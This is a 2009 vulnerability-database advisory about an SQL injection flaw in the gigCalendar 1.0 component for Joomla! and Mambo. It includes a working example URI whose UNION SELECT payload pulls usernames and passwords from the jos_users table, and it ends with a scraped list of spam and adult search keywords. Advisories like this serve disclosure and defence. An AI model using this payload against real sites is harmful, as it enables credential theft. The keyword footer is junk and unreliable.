about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Joomla! and Mambo gigCalendar Component SQL Injection Vulnerability


Title Joomla! and Mambo gigCalendar Component SQL Injection Vulnerability
Published 2009-01-13-12:00AM
Updated 2009-01-14-04:52PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  boom3rang
Vulnerable  gigCalendar gigCalendar 1.0
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example URI is available:http://www.example.com/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 06:24:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
gagan Sex4u Soon 18 atm /search/ex www.nczp.c yxwlkj.com lobos Brazil Sex Se. qgit news for c open ssl 0 kernel ove file no. Cross-Site Crack Data Se. Affidavit yxwlkj.com Horse+fuck www.sooopu SSH-1.99-O free gg do www.88by88 Ftvsexgirl go-private WS FTP 1.0 nexopia.co Sexy imaje Www.myspac Web Wiz Fo www.desima www.goddpa p.dgyr.com sexphoto mambo Remo 200 /compo witch pooja umas t67t Fedora Cor www.myster osscomerce www.tamil fixtures p sexy phtoe yxuwo.cn maxcpm.inf 33ccccc.cn